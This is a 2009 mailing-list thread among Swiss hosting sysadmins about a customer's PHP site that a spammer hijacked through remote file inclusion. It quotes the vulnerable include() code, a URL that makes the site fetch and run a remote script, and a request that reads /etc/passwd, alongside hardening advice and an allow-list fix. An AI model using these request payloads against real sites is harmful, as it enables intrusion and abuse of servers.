Re: [swinog] F*ing Spammers and stupid customer code...
And disable curl module BTW ;)

On Thu, Feb 19, 2009 at 4:41 PM, Radek Mrskos mrs...@volume.ch wrote:

I think, this is what you should have anyway in your php.ini

    allow_url_fopen = Off

/Radek

___
swinog mailing list
swinog@lists.swinog.ch
http://lists.swinog.ch/cgi-bin/mailman/listinfo/swinog
Re: [swinog] F*ing Spammers and stupid customer code...
luckily in this very single case! :)

On 19.02.2009, at 17:05, Mike Kellenberger wrote:

luckily in this case: it's a windows server...

regards, mike

--
Mike Kellenberger
mike.kellenber...@escapenet.ch
Escapenet - the Web Company
Tel +41 52 235 0700
http://www.escapenet.ch
Skype mikek70atwork

-----Original Message-----
From: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] On Behalf Of Gianni Carafa
Sent: Thursday, 19 February 2009 17:04
To: swi...@swinog.ch
Subject: Re: [swinog] F*ing Spammers and stupid customer code...

That's bad coding anyway:

http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd

Regards
Gianni

Radek Mrskos wrote:

I think, this is what you should have anyway in your php.ini

    allow_url_fopen = Off

/Radek

On 19.02.2009 at 16:31, Mike Kellenberger wrote:

Hi all

Just stopped our mail server from spitting out thousands of spam messages.

We have a customer who has a site with the following (stupid) code in his index.php:

    if($called_page_link!="") {
        $requested_file=$called_page_link;
    }
    include($requested_file);

The f*ing spammer found out about this and called the page with:

http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocities.com/nimiuu/fuck.txt?

Boom.

Have I already told you that I hate spammers? :-)

Oh well, one down - a few million to go...

Regards, Mike

--
Mike Kellenberger
mike.kellenber...@escapenet.ch
Escapenet - the Web Company
Tel +41 52 235 0700
http://www.escapenet.ch
Skype mikek70atwork

Kind regards

Radek Mrskos          Email: mrs...@volume.ch
Baechlerstr. 12       Tel: +41 43 534 40 24
CH-8802 Kilchberg     Mob: +41 79 219 68 66
PGP:0x8CB69F6D        Fax: +41 86079 2196 866
Re: [swinog] F*ing Spammers and stupid customer code...
luckily in this case: it's a windows server...

regards, mike

--
Mike Kellenberger
mike.kellenber...@escapenet.ch
Escapenet - the Web Company
Tel +41 52 235 0700
http://www.escapenet.ch
Skype mikek70atwork

-----Original Message-----
From: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] On Behalf Of Gianni Carafa
Sent: Thursday, 19 February 2009 17:04
To: swi...@swinog.ch
Subject: Re: [swinog] F*ing Spammers and stupid customer code...

That's bad coding anyway:

http://www.thestupidcustomer.xy/index.php?called_page_link=/etc/passwd

Regards
Gianni

Radek Mrskos wrote:

I think, this is what you should have anyway in your php.ini

    allow_url_fopen = Off

/Radek

On 19.02.2009 at 16:31, Mike Kellenberger wrote:

Hi all

Just stopped our mail server from spitting out thousands of spam messages.

We have a customer who has a site with the following (stupid) code in his index.php:

    if($called_page_link!="") {
        $requested_file=$called_page_link;
    }
    include($requested_file);

The f*ing spammer found out about this and called the page with:

http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocities.com/nimiuu/fuck.txt?

Boom.

Have I already told you that I hate spammers? :-)

Oh well, one down - a few million to go...

Regards, Mike

--
Mike Kellenberger
mike.kellenber...@escapenet.ch
Escapenet - the Web Company
Tel +41 52 235 0700
http://www.escapenet.ch
Skype mikek70atwork

Kind regards

Radek Mrskos          Email: mrs...@volume.ch
Baechlerstr. 12       Tel: +41 43 534 40 24
CH-8802 Kilchberg     Mob: +41 79 219 68 66
PGP:0x8CB69F6D        Fax: +41 86079 2196 866
Re: [swinog] F*ing Spammers and stupid customer code...
Hey Mike

First thing to remember: never get nervous about a spammer! There are too many out there. It's just not worth your time to get angry about such things... It was our choice to get sysadmins - spamfighting is one of our big daily tasks. We might as well work for McDonalds - there's spam too.

Turning off allow_url_fopen and CURL might give you some headaches about customers that definitely need the option to fetch remote data. So here's my recommended setup (allow_url_include was introduced in PHP 5.2.0):

    allow_url_fopen = On
    allow_url_include = Off

This will prevent you from the most stupid spammers, at least.

Next, work on some secure PHP setup, say: running PHP as CGI with Apache's SuExec. You should also throttle emails sent by PHP, e.g. with a simple sendmail wrapper:

http://www.iezzi.ch/archives/258
http://www.iezzi.ch/archives/217

Regards,
Philip

--
Onlime Webhosting
Wachterweg 21
CH-8057 Zürich
phone +41 44 508 0702
skype ondalime
i...@onlime.ch - http://www.onlime.ch

On 19.02.2009, at 16:46, Mike Kellenberger wrote:

totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)

Regards, Mike

--
Mike Kellenberger
mike.kellenber...@escapenet.ch
Escapenet - the Web Company
Tel +41 52 235 0700
http://www.escapenet.ch
Skype mikek70atwork

-----Original Message-----
From: swinog-boun...@lists.swinog.ch [mailto:swinog-boun...@lists.swinog.ch] On Behalf Of Radek Mrskos
Sent: Thursday, 19 February 2009 16:41
To: Mike Kellenberger
Cc: swi...@swinog.ch
Subject: Re: [swinog] F*ing Spammers and stupid customer code...

I think, this is what you should have anyway in your php.ini

    allow_url_fopen = Off

/Radek

On 19.02.2009 at 16:31, Mike Kellenberger wrote:

Hi all

Just stopped our mail server from spitting out thousands of spam messages.

We have a customer who has a site with the following (stupid) code in his index.php:

    if($called_page_link!="") {
        $requested_file=$called_page_link;
    }
    include($requested_file);

The f*ing spammer found out about this and called the page with:

http://www.thestupidcustomer.xy/index.php?called_page_link=http://geocities.com/nimiuu/fuck.txt?

Boom.

Have I already told you that I hate spammers? :-)

Oh well, one down - a few million to go...

Regards, Mike

--
Mike Kellenberger
mike.kellenber...@escapenet.ch
Escapenet - the Web Company
Tel +41 52 235 0700
http://www.escapenet.ch
Skype mikek70atwork

Kind regards

Radek Mrskos          Email: mrs...@volume.ch
Baechlerstr. 12       Tel: +41 43 534 40 24
CH-8802 Kilchberg     Mob: +41 79 219 68 66
PGP:0x8CB69F6D        Fax: +41 86079 2196 866
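
The include pattern quoted in this thread, rewritten as an allow-list lookup. This is an added example, not code from any of the posters or from the customer site; the page names, file paths and the resolve_page() helper are hypothetical. It refuses both request shapes mentioned in the thread (a remote URL and /etc/passwd) regardless of how allow_url_fopen and allow_url_include are set.

```php
<?php
// Added example, not code from the thread. Page names, paths and
// resolve_page() are hypothetical.

// Public page names mapped to files shipped with the site. Only these
// values can reach include(); the request never supplies a path or URL.
const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
];

// Return the absolute file to include for a request value, or null.
function resolve_page($requested, string $baseDir, array $pages = PAGES): ?string
{
    // Missing values and arrays (?called_page_link[]=x) are rejected.
    if (!is_string($requested) || !array_key_exists($requested, $pages)) {
        return null;
    }
    // realpath() resolves symlinks and returns false for missing files,
    // so a mapped file that ends up outside $baseDir is refused too.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $pages[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Defence in depth: the php.ini setting recommended in the thread.
if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
    trigger_error('allow_url_include is On', E_USER_WARNING);
}

// Constructed demo site in a temp directory so the script runs offline.
$base = sys_get_temp_dir() . '/include_demo_' . getmypid();
mkdir($base . '/pages', 0700, true);
foreach (PAGES as $name => $rel) {
    file_put_contents("$base/$rel", "<?php echo 'page: $name', PHP_EOL;\n");
}

// Constructed inputs: the two request shapes from the thread, one valid name.
$samples = ['http://attacker.example/payload.txt?', '/etc/passwd', 'home'];
foreach ($samples as $value) {
    $file = resolve_page($value, $base);
    echo str_pad($value, 40), $file === null ? "rejected (404)\n" : "include $file\n";
    if ($file !== null) {
        include $file; // only ever a path taken from PAGES
    }
}
```

In a real index.php the value would come from $_GET['called_page_link'] rather than from a bare $called_page_link variable, and a null result would be answered with a 404.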
Re: [swinog] F*ing Spammers and stupid customer code...
Mike Kellenberger wrote:

totally correct, thanks! Looks like I'm the stupid SysAdmin as well... :-)

Actually, this problem has been known for ages. I wonder why you fell into that right now.

But what I really realise is that this list is populated by Swiss Hosting Sysadmins from all important hosters. But they don't really share their experience and their actual problems. I mean in my old hosting days, I was glad to have some direct connections (for example per IRC), where I just could point out some troubles and solve them quickly.

So Hosting-Sysadmins, please get together and share your mind! This list is very network related and that is good. Probably another list would suit better for all hosters.

Cheerz,
- Dan

PS: If I still was with a hoster, I would now take care of that. So maybe someone else can take the initiative.